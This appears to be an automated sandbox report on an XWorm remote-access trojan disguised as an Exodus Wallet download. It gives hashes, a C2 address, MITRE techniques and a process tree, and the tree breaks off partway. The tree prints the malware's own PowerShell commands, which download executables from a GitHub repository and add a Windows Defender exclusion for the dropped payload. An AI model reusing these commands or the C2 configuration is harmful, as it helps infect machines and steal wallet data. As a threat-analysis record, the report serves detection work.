xworm | 91017e11d0af0c3addbcc9624d6018d783d357b326c6620ed46686a14e33558d

Analysis

max time kernel
1006s
max time network
1050s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
05/03/2025, 22:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.html
Size

7KB
MD5

f8e6c016130cbc130645e658e06a2995
SHA1

0092a052e3b6d35d36c6b3b510c0a420dd815d93
SHA256

91017e11d0af0c3addbcc9624d6018d783d357b326c6620ed46686a14e33558d
SHA512

a4a4ca6c98a62d5e1c8e609ef80e9a264d8c89ecd9a835260d5488850af514f740f166954e683c6c522114b222dfaaef3292d2f5ff61490c4cc219cc58a058a8
SSDEEP

192:PN2x2BR7VSWyglyj6RMbSoEddJgMuUyTN:AxI7jrM68SoEdvaHN

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1868-388-0x0000000001430000-0x000000000143E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
104	2968	powershell.exe
105	2968	powershell.exe
106	3956	powershell.exe
107	3956	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
3956	powershell.exe
2492	powershell.exe
404	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe

Executes dropped EXE 19 IoCs

pid	Process
1200	ExodusInject.exe
1948	Exodus.exe
1868	AggregatorHost.exe
2152	ExodusInject.exe
3604	System.exe
1612	System.exe
2708	System.exe
4984	System.exe
3084	System.exe
4756	System.exe
2960	System.exe
5312	System.exe
2696	System.exe
3828	System.exe
3276	System.exe
1712	System.exe
1964	System.exe
5564	System.exe
2644	System.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
56	raw.githubusercontent.com
105	raw.githubusercontent.com
107	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4136	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298619118-249045975-4264763259-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\ExodusWallet.zip:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4284	schtasks.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3444	msedge.exe
3444	msedge.exe
3000	msedge.exe
3000	msedge.exe
4724	identity_helper.exe
4724	identity_helper.exe
4136	msedge.exe
4136	msedge.exe
3292	msedge.exe
3292	msedge.exe
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
3956	powershell.exe
3956	powershell.exe
3956	powershell.exe
404	powershell.exe
404	powershell.exe
404	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	3956	powershell.exe
Token: SeDebugPrivilege	1200	ExodusInject.exe
Token: SeBackupPrivilege	4276	vssvc.exe
Token: SeRestorePrivilege	4276	vssvc.exe
Token: SeAuditPrivilege	4276	vssvc.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	1868	AggregatorHost.exe
Token: SeDebugPrivilege	1868	AggregatorHost.exe
Token: SeDebugPrivilege	2152	ExodusInject.exe
Token: SeDebugPrivilege	3604	System.exe
Token: SeDebugPrivilege	1612	System.exe
Token: SeDebugPrivilege	2708	System.exe
Token: SeDebugPrivilege	4984	System.exe
Token: SeDebugPrivilege	3084	System.exe
Token: SeDebugPrivilege	4756	System.exe
Token: SeDebugPrivilege	2960	System.exe
Token: SeDebugPrivilege	5312	System.exe
Token: SeDebugPrivilege	2696	System.exe
Token: SeDebugPrivilege	3828	System.exe
Token: SeDebugPrivilege	3276	System.exe
Token: SeDebugPrivilege	1712	System.exe
Token: SeDebugPrivilege	1964	System.exe
Token: SeDebugPrivilege	5564	System.exe
Token: SeDebugPrivilege	2644	System.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe

Suspicious use of SendNotifyMessage 18 IoCs

pid	Process
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5372	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3000 wrote to memory of 568	3000	msedge.exe	81
PID 3000 wrote to memory of 568	3000	msedge.exe	81
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3392	3000	msedge.exe	82
PID 3000 wrote to memory of 3444	3000	msedge.exe	83
PID 3000 wrote to memory of 3444	3000	msedge.exe	83
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84
PID 3000 wrote to memory of 3848	3000	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\file.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff840bd3cb8,0x7ff840bd3cc8,0x7ff840bd3cd8
  2⤵
  PID:568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:2
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
  2⤵
  PID:3848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  PID:3368
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
  2⤵
  PID:3192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:3096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:3388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
  2⤵
  PID:2504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
  2⤵
  PID:564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:1
  2⤵
  PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5960 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9275208238764825976,2267731487456657624,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
  2⤵
  PID:3040

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2004

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:840

C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe
"C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4284
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1090.tmp\1091.tmp\1092.bat C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe"
  2⤵
  PID:3312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3956
- - C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe
    "C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
